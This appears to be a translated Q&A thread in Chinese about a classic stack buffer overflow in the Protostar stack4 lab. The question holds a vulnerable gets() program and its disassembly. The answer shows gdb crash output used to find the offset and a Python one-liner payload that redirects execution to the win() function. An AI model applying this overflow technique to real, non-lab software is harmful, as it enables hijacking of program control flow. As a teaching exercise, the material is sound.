无法覆盖寄信人地址(eip)

时间:2019-12-19 18:11:09

标签: c gdb buffer-overflow

我正在尝试利用此程序中的缓冲区溢出 我正在使用32位的kali_linux

#include <stdlib.h>
void win()
{
printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
char buffer[64];

gets(buffer);
}

我使用了pattern_offset来获取应该覆盖的覆盖量:72 发生的是:EBP被覆盖,但是即使溢出了72 + 4个字节来覆盖ebp +函数地址来覆盖返回地址,EIP也不会被覆盖

EIP:0x40120f(:ret)

总是指向寄信人地址。

isassembly of section .init:

00001000 <_init>:
    1000:       53                      push   %ebx
    1001:       83 ec 08                sub    $0x8,%esp
    1004:       e8 a7 00 00 00          call   10b0 <__x86.get_pc_thunk.bx>
    1009:       81 c3 f7 2f 00 00       add    $0x2ff7,%ebx
    100f:       8b 83 f4 ff ff ff       mov    -0xc(%ebx),%eax
    1015:       85 c0                   test   %eax,%eax
    1017:       74 02                   je     101b <_init+0x1b>
    1019:       ff d0                   call   *%eax
    101b:       83 c4 08                add    $0x8,%esp
    101e:       5b                      pop    %ebx
    101f:       c3                      ret    

Disassembly of section .plt:

00001020 <.plt>:
    1020:       ff b3 04 00 00 00       pushl  0x4(%ebx)
    1026:       ff a3 08 00 00 00       jmp    *0x8(%ebx)
    102c:       00 00                   add    %al,(%eax)
        ...

00001030 <gets@plt>:
    1030:       ff a3 0c 00 00 00       jmp    *0xc(%ebx)
    1036:       68 00 00 00 00          push   $0x0
    103b:       e9 e0 ff ff ff          jmp    1020 <.plt>

00001040 <puts@plt>:
    1040:       ff a3 10 00 00 00       jmp    *0x10(%ebx)
    1046:       68 08 00 00 00          push   $0x8
    104b:       e9 d0 ff ff ff          jmp    1020 <.plt>

00001050 <__libc_start_main@plt>:
    1050:       ff a3 14 00 00 00       jmp    *0x14(%ebx)
    1056:       68 10 00 00 00          push   $0x10
    105b:       e9 c0 ff ff ff          jmp    1020 <.plt>

Disassembly of section .plt.got:

00001060 <__cxa_finalize@plt>:
    1060:       ff a3 f0 ff ff ff       jmp    *-0x10(%ebx)
    1066:       66 90                   xchg   %ax,%ax

Disassembly of section .text:

00001070 <_start>:
    1070:       31 ed                   xor    %ebp,%ebp
    1072:       5e                      pop    %esi
    1073:       89 e1                   mov    %esp,%ecx
    1075:       83 e4 f0                and    $0xfffffff0,%esp
    1078:       50                      push   %eax
    1079:       54                      push   %esp
    107a:       52                      push   %edx
    107b:       e8 22 00 00 00          call   10a2 <_start+0x32>
    1080:       81 c3 80 2f 00 00       add    $0x2f80,%ebx
    1086:       8d 83 80 d2 ff ff       lea    -0x2d80(%ebx),%eax
    108c:       50                      push   %eax
    108d:       8d 83 20 d2 ff ff       lea    -0x2de0(%ebx),%eax
    1093:       50                      push   %eax
    1094:       51                      push   %ecx
    1095:       56                      push   %esi
    1096:       ff b3 f8 ff ff ff       pushl  -0x8(%ebx)
    109c:       e8 af ff ff ff          call   1050 <__libc_start_main@plt>
    10a1:       f4                      hlt    
    10a2:       8b 1c 24                mov    (%esp),%ebx
    10a5:       c3                      ret    
    10a6:       66 90                   xchg   %ax,%ax
    10a8:       66 90                   xchg   %ax,%ax
    10aa:       66 90                   xchg   %ax,%ax
    10ac:       66 90                   xchg   %ax,%ax
    10ae:       66 90                   xchg   %ax,%ax

000010b0 <__x86.get_pc_thunk.bx>:
    10b0:       8b 1c 24                mov    (%esp),%ebx
    10b3:       c3                      ret    
    10b4:       66 90                   xchg   %ax,%ax
    10b6:       66 90                   xchg   %ax,%ax
    10b8:       66 90                   xchg   %ax,%ax
    10ba:       66 90                   xchg   %ax,%ax
    10bc:       66 90                   xchg   %ax,%ax
    10be:       66 90                   xchg   %ax,%ax

000010c0 <deregister_tm_clones>:
    10c0:       e8 e0 00 00 00          call   11a5 <__x86.get_pc_thunk.dx>
    10c5:       81 c2 3b 2f 00 00       add    $0x2f3b,%edx
    10cb:       8d 8a 20 00 00 00       lea    0x20(%edx),%ecx
    10d1:       8d 82 20 00 00 00       lea    0x20(%edx),%eax
    10d7:       39 c8                   cmp    %ecx,%eax
    10d9:       74 1d                   je     10f8 <deregister_tm_clones+0x38>
    10db:       8b 82 ec ff ff ff       mov    -0x14(%edx),%eax
    10e1:       85 c0                   test   %eax,%eax
    10e3:       74 13                   je     10f8 <deregister_tm_clones+0x38>
    10e5:       55                      push   %ebp
    10e6:       89 e5                   mov    %esp,%ebp
    10e8:       83 ec 14                sub    $0x14,%esp
    10eb:       51                      push   %ecx
    10ec:       ff d0                   call   *%eax
    10ee:       83 c4 10                add    $0x10,%esp
    10f1:       c9                      leave  
    10f2:       c3                      ret    
    10f3:       8d 74 26 00             lea    0x0(%esi,%eiz,1),%esi
    10f7:       90                      nop
    10f8:       c3                      ret    
    10f9:       8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi

00001100 <register_tm_clones>:
    1100:       e8 a0 00 00 00          call   11a5 <__x86.get_pc_thunk.dx>
    1105:       81 c2 fb 2e 00 00       add    $0x2efb,%edx
    110b:       55                      push   %ebp
    110c:       89 e5                   mov    %esp,%ebp
    110e:       53                      push   %ebx
    110f:       8d 8a 20 00 00 00       lea    0x20(%edx),%ecx
    1115:       8d 82 20 00 00 00       lea    0x20(%edx),%eax
    111b:       83 ec 04                sub    $0x4,%esp
    111e:       29 c8                   sub    %ecx,%eax
    1120:       89 c3                   mov    %eax,%ebx
    1122:       c1 e8 1f                shr    $0x1f,%eax
    1125:       c1 fb 02                sar    $0x2,%ebx
    1128:       01 d8                   add    %ebx,%eax
    112a:       d1 f8                   sar    %eax
    112c:       74 14                   je     1142 <register_tm_clones+0x42>
    112e:       8b 92 fc ff ff ff       mov    -0x4(%edx),%edx
    1134:       85 d2                   test   %edx,%edx
    1136:       74 0a                   je     1142 <register_tm_clones+0x42>
    1138:       83 ec 08                sub    $0x8,%esp
    113b:       50                      push   %eax
    113c:       51                      push   %ecx
    113d:       ff d2                   call   *%edx
    113f:       83 c4 10                add    $0x10,%esp
    1142:       8b 5d fc                mov    -0x4(%ebp),%ebx
    1145:       c9                      leave  
    1146:       c3                      ret    
    1147:       8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi
    114e:       66 90                   xchg   %ax,%ax

00001150 <__do_global_dtors_aux>:
    1150:       55                      push   %ebp
    1151:       89 e5                   mov    %esp,%ebp
    1153:       53                      push   %ebx
    1154:       e8 57 ff ff ff          call   10b0 <__x86.get_pc_thunk.bx>
    1159:       81 c3 a7 2e 00 00       add    $0x2ea7,%ebx
    115f:       83 ec 04                sub    $0x4,%esp
    1162:       80 bb 20 00 00 00 00    cmpb   $0x0,0x20(%ebx)
    1169:       75 27                   jne    1192 <__do_global_dtors_aux+0x42>
    116b:       8b 83 f0 ff ff ff       mov    -0x10(%ebx),%eax
    1171:       85 c0                   test   %eax,%eax
    1173:       74 11                   je     1186 <__do_global_dtors_aux+0x36>
    1175:       83 ec 0c                sub    $0xc,%esp
    1178:       ff b3 1c 00 00 00       pushl  0x1c(%ebx)
    117e:       e8 dd fe ff ff          call   1060 <__cxa_finalize@plt>
    1183:       83 c4 10                add    $0x10,%esp
    1186:       e8 35 ff ff ff          call   10c0 <deregister_tm_clones>
    118b:       c6 83 20 00 00 00 01    movb   $0x1,0x20(%ebx)
    1192:       8b 5d fc                mov    -0x4(%ebp),%ebx
    1195:       c9                      leave  
    1196:       c3                      ret    
    1197:       8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi
    119e:       66 90                   xchg   %ax,%ax

000011a0 <frame_dummy>:
    11a0:       e9 5b ff ff ff          jmp    1100 <register_tm_clones>

000011a5 <__x86.get_pc_thunk.dx>:
    11a5:       8b 14 24                mov    (%esp),%edx
    11a8:       c3                      ret    

000011a9 <win>:
    11a9:       55                      push   %ebp
    11aa:       89 e5                   mov    %esp,%ebp
    11ac:       53                      push   %ebx
    11ad:       83 ec 04                sub    $0x4,%esp
    11b0:       e8 5b 00 00 00          call   1210 <__x86.get_pc_thunk.ax>
    11b5:       05 4b 2e 00 00          add    $0x2e4b,%eax
    11ba:       83 ec 0c                sub    $0xc,%esp
    11bd:       8d 90 08 e0 ff ff       lea    -0x1ff8(%eax),%edx
    11c3:       52                      push   %edx
    11c4:       89 c3                   mov    %eax,%ebx
    11c6:       e8 75 fe ff ff          call   1040 <puts@plt>
    11cb:       83 c4 10                add    $0x10,%esp
    11ce:       90                      nop
    11cf:       8b 5d fc                mov    -0x4(%ebp),%ebx
    11d2:       c9                      leave  
    11d3:       c3                      ret    

000011d4 <main>:
    11d4:       8d 4c 24 04             lea    0x4(%esp),%ecx
    11d8:       83 e4 f0                and    $0xfffffff0,%esp
    11db:       ff 71 fc                pushl  -0x4(%ecx)
    11de:       55                      push   %ebp
    11df:       89 e5                   mov    %esp,%ebp
    11e1:       53                      push   %ebx
    11e2:       51                      push   %ecx
    11e3:       83 ec 40                sub    $0x40,%esp
    11e6:       e8 25 00 00 00          call   1210 <__x86.get_pc_thunk.ax>
    11eb:       05 15 2e 00 00          add    $0x2e15,%eax
    11f0:       83 ec 0c                sub    $0xc,%esp
    11f3:       8d 55 b8                lea    -0x48(%ebp),%edx
    11f6:       52                      push   %edx
    11f7:       89 c3                   mov    %eax,%ebx
    11f9:       e8 32 fe ff ff          call   1030 <gets@plt>
    11fe:       83 c4 10                add    $0x10,%esp
    1201:       b8 00 00 00 00          mov    $0x0,%eax
    1206:       8d 65 f8                lea    -0x8(%ebp),%esp
    1209:       59                      pop    %ecx
    120a:       5b                      pop    %ebx
    120b:       5d                      pop    %ebp
    120c:       8d 61 fc                lea    -0x4(%ecx),%esp
    120f:       c3                      ret    

00001210 <__x86.get_pc_thunk.ax>:
    1210:       8b 04 24                mov    (%esp),%eax
    1213:       c3                      ret    
    1214:       66 90                   xchg   %ax,%ax
    1216:       66 90                   xchg   %ax,%ax
    1218:       66 90                   xchg   %ax,%ax
    121a:       66 90                   xchg   %ax,%ax
    121c:       66 90                   xchg   %ax,%ax
    121e:       66 90                   xchg   %ax,%ax

00001220 <__libc_csu_init>:
    1220:       55                      push   %ebp
    1221:       e8 5b 00 00 00          call   1281 <__x86.get_pc_thunk.bp>
    1226:       81 c5 da 2d 00 00       add    $0x2dda,%ebp
    122c:       57                      push   %edi
    122d:       56                      push   %esi
    122e:       53                      push   %ebx
    122f:       83 ec 0c                sub    $0xc,%esp
    1232:       89 eb                   mov    %ebp,%ebx
    1234:       8b 7c 24 28             mov    0x28(%esp),%edi
    1238:       e8 c3 fd ff ff          call   1000 <_init>
    123d:       8d 9d f8 fe ff ff       lea    -0x108(%ebp),%ebx
    1243:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
    1249:       29 c3                   sub    %eax,%ebx
    124b:       c1 fb 02                sar    $0x2,%ebx
    124e:       74 25                   je     1275 <__libc_csu_init+0x55>
    1250:       31 f6                   xor    %esi,%esi
    1252:       8d b6 00 00 00 00       lea    0x0(%esi),%esi
    1258:       83 ec 04                sub    $0x4,%esp
    125b:       57                      push   %edi
    125c:       ff 74 24 2c             pushl  0x2c(%esp)
    1260:       ff 74 24 2c             pushl  0x2c(%esp)
    1264:       ff 94 b5 f4 fe ff ff    call   *-0x10c(%ebp,%esi,4)
    126b:       83 c6 01                add    $0x1,%esi
    126e:       83 c4 10                add    $0x10,%esp
    1271:       39 f3                   cmp    %esi,%ebx
    1273:       75 e3                   jne    1258 <__libc_csu_init+0x38>
    1275:       83 c4 0c                add    $0xc,%esp
    1278:       5b                      pop    %ebx
    1279:       5e                      pop    %esi
    127a:       5f                      pop    %edi
    127b:       5d                      pop    %ebp
    127c:       c3                      ret    
    127d:       8d 76 00                lea    0x0(%esi),%esi

00001280 <__libc_csu_fini>:
    1280:       c3                      ret    

00001281 <__x86.get_pc_thunk.bp>:
    1281:       8b 2c 24                mov    (%esp),%ebp
    1284:       c3                      ret    

Disassembly of section .fini:

00001288 <_fini>:
    1288:       53                      push   %ebx
    1289:       83 ec 08                sub    $0x8,%esp
    128c:       e8 1f fe ff ff          call   10b0 <__x86.get_pc_thunk.bx>
    1291:       81 c3 6f 2d 00 00       add    $0x2d6f,%ebx
    1297:       83 c4 08                add    $0x8,%esp
    129a:       5b                      pop    %ebx
    129b:       c3                      ret    

1 个答案:

答案 0 :(得分:0)

我想您可能喜欢将某些东西重定向到功能win()

使用win()查找一个nm函数地址:

user@protostar:/opt/protostar/bin$ nm stack4 | grep win
080483f4 T win

是的,程序会在76崩溃,然后才能在eip覆盖77

76 A:

user@protostar:/opt/protostar/bin$ gdb -q stack4
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r
Starting program: /opt/protostar/bin/stack4 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb) 

77 A:

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0xb7ea0041 in ?? () from /lib/libc.so.6
(gdb)

请参见地址41上的0xb7ea0041

解决方案:

user@protostar:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
user@protostar:/opt/protostar/bin$